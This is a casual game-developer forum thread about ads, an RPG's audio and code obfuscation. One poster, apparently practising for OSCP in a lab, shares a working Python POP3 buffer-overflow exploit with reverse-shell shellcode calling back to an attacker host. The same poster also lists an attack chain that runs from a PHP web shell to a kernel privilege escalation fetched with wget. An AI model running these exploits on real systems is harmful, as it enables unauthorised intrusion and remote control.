I'm writing a scripting language for my AI, and now I understand and appreciate why some languages require specific tabbing, goto, and "endif" and all that (it's easier). I'm also very familiar with stacks now.

Edit: seeing my code outside of FD lets me see bugs more easily it seems...issue with elseif.

Invisible Inc just came out today on steam, and I highly recommend it. It's a stealth strategy/tactics game. I like it because if you get caught, it's not a dumb fight sequence and then you're running a mile to get out of the enemy's patrol radius.

Also I found Zenzizenzic on early access. Super fun super hard shmup with great music.

At 3/31/15 05:12 AM, egg82 wrote:

Hold me, I'm drunk

You're over 21 now?

(I don't know, I just came back to NG)

At 5/13/15 09:20 PM, FlyingColours wrote: You're over 21 now?

22 or 23 now, I can't quite remember. I think I'm 22.

I've been gone a while. Just getting shit done :P

I work at Elitch Gardens now, so that's a thing

At 5/20/15 02:44 AM, egg82 wrote:

At 5/13/15 09:20 PM, FlyingColours wrote: You're over 21 now?

22 or 23 now, I can't quite remember. I think I'm 22.

LOL, forgetting your age is a pretty drunk thing to do :P

(Speaking of which, have I told you how old I am? I think MintPaw and a few other NGers know, but I can't remember if I've told you.)

I've been gone a while. Just getting shit done :P

I work at Elitch Gardens now, so that's a thing

Cool! What do you do there?

In other news, I'm returning to my RPG to fix the music, but I can't remember what exactly the problem that tripped me up was. It's something related to playing music in Chrome, certainly.

I'm scr*wed

At 5/24/15 04:45 AM, FlyingColours wrote: (Speaking of which, have I told you how old I am? I think MintPaw and a few other NGers know, but I can't remember if I've told you.)

Like 19 or 20?

At 5/24/15 12:45 PM, MSGhero wrote:

At 5/24/15 04:45 AM, FlyingColours wrote: (Speaking of which, have I told you how old I am? I think MintPaw and a few other NGers know, but I can't remember if I've told you.)

Like 19 or 20?

I am younger than you were when I first met you.

At 5/24/15 04:47 AM, FlyingColours wrote: In other news, I'm returning to my RPG to fix the music, but I can't remember what exactly the problem that tripped me up was. It's something related to playing music in Chrome, certainly.

I'm scr*wed

Update. I've finally understood my old code, and what's more, I've fixed everything. Yay!

Now for volume control.

I work in food service, yay.

In other news, I'm currently studying for my OSCP. Wish me luck!

At 5/24/15 03:11 PM, egg82 wrote: I work in food service, yay.

Sorry.

In other news, I'm currently studying for my OSCP. Wish me luck!

Good luck!

Added SFX to Xirang!

Careful when you go from Ghost Torture Pass to the Yin Mountains! You may get a heart attack.

At 5/25/15 10:05 AM, FlyingColours wrote: Added SFX to Xirang!

Careful when you go from Ghost Torture Pass to the Yin Mountains! You may get a heart attack.

Sounds like you need to tone the volume down lol.

At 5/25/15 10:46 AM, MSGhero wrote:

At 5/25/15 10:05 AM, FlyingColours wrote: Added SFX to Xirang!

Careful when you go from Ghost Torture Pass to the Yin Mountains! You may get a heart attack.

Sounds like you need to tone the volume down lol.

Awww.... I love it though! It happens at the exact moment where the loading doors open to reveal a gate, and is totally Hollywoody... It even matches the Beethoven in the background!

You know, do you guys think it's good enough for Tom to sponsor it?

(Flashads don't work in the game, obviously...)

I'll be very happy to put up huge Tankman posters on the loading screen (which appears whenever the player changes location), and I'm working on adding medals.

At 5/25/15 11:19 AM, FlyingColours wrote: You know, do you guys think it's good enough for Tom to sponsor it?

(Flashads don't work in the game, obviously...)

I think you still get preroll and page ads.

At 5/25/15 11:49 AM, MSGhero wrote:

At 5/25/15 11:19 AM, FlyingColours wrote: You know, do you guys think it's good enough for Tom to sponsor it?

(Flashads don't work in the game, obviously...)

I think you still get preroll and page ads.

They seem to be much less effective than in-game adverts though...

Since you have had games frontpaged before, do you think that is the case?

#!/usr/bin/python

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
overflow = "\x90" * 2606 # Create the buffer overflow
EIP = "\x8F\x35\x4A\x5F" # JMP ESP in SLMFC.dll (x86, little endian)
swap = "\x90" * 16 # Stack space for decoding
shell = ("\xdd\xc0\xb8\x6f\x1b\x9d\x92\xd9\x74\x24\xf4\x5a\x2b\xc9" +
"\xb1\x4f\x31\x42\x19\x83\xea\xfc\x03\x42\x15\x8d\xee\x61" +
"\x7a\xd8\x11\x9a\x7b\xba\x98\x7f\x4a\xe8\xff\xf4\xff\x3c" +
"\x8b\x59\x0c\xb7\xd9\x49\x87\xb5\xf5\x7e\x20\x73\x20\xb0" +
"\xb1\xb2\xec\x1e\x71\xd5\x90\x5c\xa6\x35\xa8\xae\xbb\x34" +
"\xed\xd3\x34\x64\xa6\x98\xe7\x98\xc3\xdd\x3b\x99\x03\x6a" +
"\x03\xe1\x26\xad\xf0\x5b\x28\xfe\xa9\xd0\x62\xe6\xc2\xbe" +
"\x52\x17\x06\xdd\xaf\x5e\x23\x15\x5b\x61\xe5\x64\xa4\x53" +
"\xc9\x2a\x9b\x5b\xc4\x33\xdb\x5c\x37\x46\x17\x9f\xca\x50" +
"\xec\xdd\x10\xd5\xf1\x46\xd2\x4d\xd2\x77\x37\x0b\x91\x74" +
"\xfc\x58\xfd\x98\x03\x8d\x75\xa4\x88\x30\x5a\x2c\xca\x16" +
"\x7e\x74\x88\x37\x27\xd0\x7f\x48\x37\xbc\x20\xec\x33\x2f" +
"\x34\x96\x19\x38\xf9\xa4\xa1\xb8\x95\xbf\xd2\x8a\x3a\x6b" +
"\x7d\xa7\xb3\xb5\x7a\xc8\xe9\x01\x14\x37\x12\x71\x3c\xfc" +
"\x46\x21\x56\xd5\xe6\xaa\xa6\xda\x32\x7c\xf7\x74\xed\x3c" +
"\xa7\x34\x5d\xd4\xad\xba\x82\xc4\xcd\x10\xb5\xc3\x5a\x5b" +
"\x6e\xc5\x47\x33\x6d\xd9\x76\x7f\xf8\x3f\x12\x6f\xad\xe8" +
"\x8b\x16\xf4\x62\x2d\xd6\x22\xe2\xce\x45\xa9\xf2\x99\x75" +
"\x66\xa5\xce\x48\x7f\x23\xe3\xf3\x29\x51\xfe\x62\x11\xd1" +
"\x25\x57\x9c\xd8\xa8\xe3\xba\xca\x74\xeb\x86\xbe\x28\xba" +
"\x50\x68\x8f\x14\x13\xc2\x59\xca\xfd\x82\x1c\x20\x3e\xd4" +
"\x20\x6d\xc8\x38\x90\xd8\x8d\x47\x1d\x8d\x19\x30\x43\x2d" +
"\xe5\xeb\xc7\x5d\xac\xb1\x6e\xf6\x69\x20\x33\x9b\x89\x9f" +
"\x70\xa2\x09\x15\x09\x51\x11\x5c\x0c\x1d\x95\x8d\x7c\x0e" +
"\x70\xb1\xd3\x2f\x51") # msfpayload windows/shell_reverse_tcp LHOST=192.168.14.221 LPORT=443 R | msfencode -b "\x00\x0a\x0d" -e x86/shikata_ga_nai
padding = "\x90" * (3500 - 2606 - 4 - 16 - 341) # Stack padding, 3500 bytes total - buffer overflow - EIP - swap space - shell payload

try:
        print "\nSending buffer.."
        s.connect(("192.168.15.70", 110))
        data = s.recv(1024)
        s.send("USER username\r\n")
        data = s.recv(1024)
        s.send("PASS " + overflow + EIP + swap + shell + padding + "\r\n")
        print "Done!"
except:
        print "Could not connect!"

I rode a buffer overflow into a reverse shell with python, I feel kinda badass :D

At 5/25/15 12:10 PM, FlyingColours wrote: Since you have had games frontpaged before, do you think that is the case?

At 43k portal ads each and 139/68k flash ads and 2.5/10k preroll ads, flash ads have portal ads beat by only $10. Portal ads have the biggest ecpm (>$4), flash ads have less than half, and preroll are like 2/3 3/4 portal ads.

At 5/25/15 03:42 PM, MSGhero wrote:

At 5/25/15 12:10 PM, FlyingColours wrote: Since you have had games frontpaged before, do you think that is the case?

At 43k portal ads each and 139/68k flash ads and 2.5/10k preroll ads, flash ads have portal ads beat by only $10. Portal ads have the biggest ecpm (>$4), flash ads have less than half, and preroll are like 2/3 3/4 portal ads.

Ah, I see. They're not so bad then.

Also, I think I'm gonna put up links to my userpage and gain a little from that.

By the way, do you think I should obfuscate the code before I publish?

I'm not sure why anyone would steal my code though. Some of the code I added late in the development process is pretty spaghetti 'cos I know I'll rewrite the engine if I make a sequel.

At 5/25/15 09:21 PM, FlyingColours wrote: By the way, do you think I should obfuscate the code before I publish?

I'm not sure how js works, but it's not worth it for flash. No one really cares about your code. I guess it wouldn't hurt. Haxe's output is a terrible thing to look through on any platform... people who encounter obfuscated code would probably quit after 45 seconds.

Security through obscurity is not security at all.

At 5/25/15 09:21 PM, FlyingColours wrote: By the way, do you think I should obfuscate the code before I publish?

Yes. Minify it, too.

At 5/26/15 04:30 AM, egg82 wrote: Security through obscurity is not security at all.

Why not? It's certainly not the best, but it definitely secures your code from at least a portion of people and, considering no security method is 100% effective, the fact it does something at the very least makes it a security measure.

It's your best (and as far as I can think, only) for client side JavaScript.

Okay... If Sam says to do it, then I'll do it.

Of course I'm going to minify! I have to make up for that embarrassing code copy-pasting that I don't want anyone to know about.

Speaking of which, I'll have to fix two minor bugs, add in volume control, add the Tankman posters anyway, make fancy scrollbars and possible a fancy cursor, test the remaining medals, and I'm all set. Probably.

What do you think about the icon?

• 

  TDR RPG: The Quest for Xirang

  by FlyingColours

  Fight enemies, find magical soil and discover your true identity... in the Underworld!

  Game Project

Edit: Wow, I can edit now! This is such a touching moment.

At 5/26/15 08:14 AM, Sam wrote: Why not? It's certainly not the best, but it definitely secures your code from at least a portion of people and, considering no security method is 100% effective, the fact it does something at the very least makes it a security measure.

It's your best (and as far as I can think, only) for client side JavaScript.

Most decompilers have built-in deobf for many common languages.
Also you can just use debuggers..
Or, ya know, not. Because some 16-year-old's game code isn't worth it unless there's MySQL information hardcoded in there or something. In which case, we're back to deobf and some quick string searches. (though honestly you wouldn't need deobf for that)

If you want to screw with JS, there's easier ways as well.

Obfuscation offers a weak solution to a (virtually) nonexistent problem.

At 5/27/15 01:13 AM, egg82 wrote: Obfuscation offers a weak solution to a (virtually) nonexistent problem.

It takes a grand total of 30 seconds to paste your code into an obfuscator. The trade off is worth it, in almost every case. Out of interest, I looked up a "deobfuscter", ripped their source, obfuscated it, and then used their tool to deobfuscate:

Original Source
Obfuscated -> Deobfuscated

I realise some may be better than others and the method of obfuscation affects the output, but I certainly wouldn't want to trawl through that code to find something. It at least deters a group of people from having access to your source code in a readable and usable format.

Basically, I see no reason not to.

At 5/27/15 01:13 AM, egg82 wrote: Most decompilers have built-in deobf for many common languages.
Also you can just use debuggers..
Or, ya know, not. Because some 16-year-old's game code isn't worth it

Actually, I'm 17 now and will be 18 in a few months. I've grown :P

unless there's MySQL information hardcoded in there or something. In which case, we're back to deobf and some quick string searches. (though honestly you wouldn't need deobf for that)

Why would anyone do that in JS?

At 5/27/15 07:19 AM, Sam wrote: Original Source
Obfuscated -> Deobfuscated

You forgot the unescape option, which turns the top array of hex values into this:

var _0xc5a6 = ["", "space_after_anon_function", "jslint_happy", "braces_on_own_line", "expand", "collapse", "brace_style", "indent_size", "indent_char", " ", "preserve_newlines", "undefined", "max_preserve_newlines", "keep_array_indentation", "space_before_conditional", "indent_case", "length", "pop", "\x0A", "\x0D", "replace", "indexOf", "substring", "push", "eat_next_space", "mode", "if_line", "indentation_level", "var_line", "var_line_reindented", "case_body", "TK_COMMENT", "BLOCK", "[EXPRESSION]", "[INDENTED-EXPRESSION]", "(EXPRESSION)", "(FOR-EXPRESSION)", "(COND-EXPRESSION)", "DO_BLOCK", "previous_mode", "charAt", "case", "return", "do", "if", "throw", "else", "TK_EOF", "\x09", "indentation_baseline", "match", "-", "+", "TK_WORD", "in", "TK_OPERATOR", "TK_EQUALS", "var", "(", "[", "TK_START_EXPR", ")", "]", "TK_END_EXPR", "{", "TK_START_BLOCK", "}", "TK_END_BLOCK", ";", "TK_SEMICOLON", "/", "*", "/*", "*/", "TK_INLINE_COMMENT", "TK_BLOCK_COMMENT", "\'", "\"", "\\", "TK_STRING", "#", "!", "=", "[]", "{}", "<", "<!--", "in_html_comment", "-->", "TK_UNKNOWN", "split", "\x0A\x0D\x09 ", "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_$", "0123456789", "+ - * / % & ++ -- = += -= *= /= %= == === != !== > < >= <= >> << >>> >>>= >>= <<= && &= | || ! !! , : ? ^ ^= |= ::", ",", "continue,try,throw,return,var,if,switch,case,default,for,while,break,function", "for", "while", ".", "function", "typeof", "catch", "expand-strict", "default", "in_case_statement", ":", "in_case", "NONE", "toLowerCase", "finally", "NEWLINE", "end-expand", "SPACE", "get", "set", "new", "var_line_tainted", "OBJECT", "::", "--", "++", "ternary_depth", "?", "slice", "join", "js_beautify", "value", "text", "getElementById", "eval", "write", "writeln", "createPopup", "createElement", "Syntax Error:\x0A", "message", "alert", "Paste code here...", "script"];

You can then make a quick script that gets the values from that array and puts them back into whatever variables are using them. Then if you want to you can modify the function variables to be just x2, x3, etc. instead of _0xeed0x2, _0xeed0x3, etc. It'll be much easier to read, then.
Again, assuming you want to put the effort into it. If you don't, then you didn't really want to do it in the first place.

True, though. I suppose if it only takes a minute then go for it. Just don't loose your source code or you'll get to go back through your obfuscated AND decompiled code.

Phoenix down!

Web fuzzer got robots.txt
Manually opened robots.txt to discover hidden /internal directory
View->Source to discover web page is a custom front-end for a system called "Advanced Comment System"
Google search revealed remote code execution exploit
Got PHP shell with apache permissions
uname showed kernel version compatible with 2009-2692 local privilege escalation exploit and fstab showed executable /tmp directory
compiled c executable on attacking machine, hosted on attacking http server, and wget to /tmp
executed, root acquired

Ka-boom.

The programmer in me is cringing at all the code I smashed into 8 bytes of memory

At 6/4/15 05:05 PM, CodeCrunch wrote: http://www.scribd.com/doc/228831637/Optimal-Tip-to-Tip-Efficiency

The hell did I just read.. ?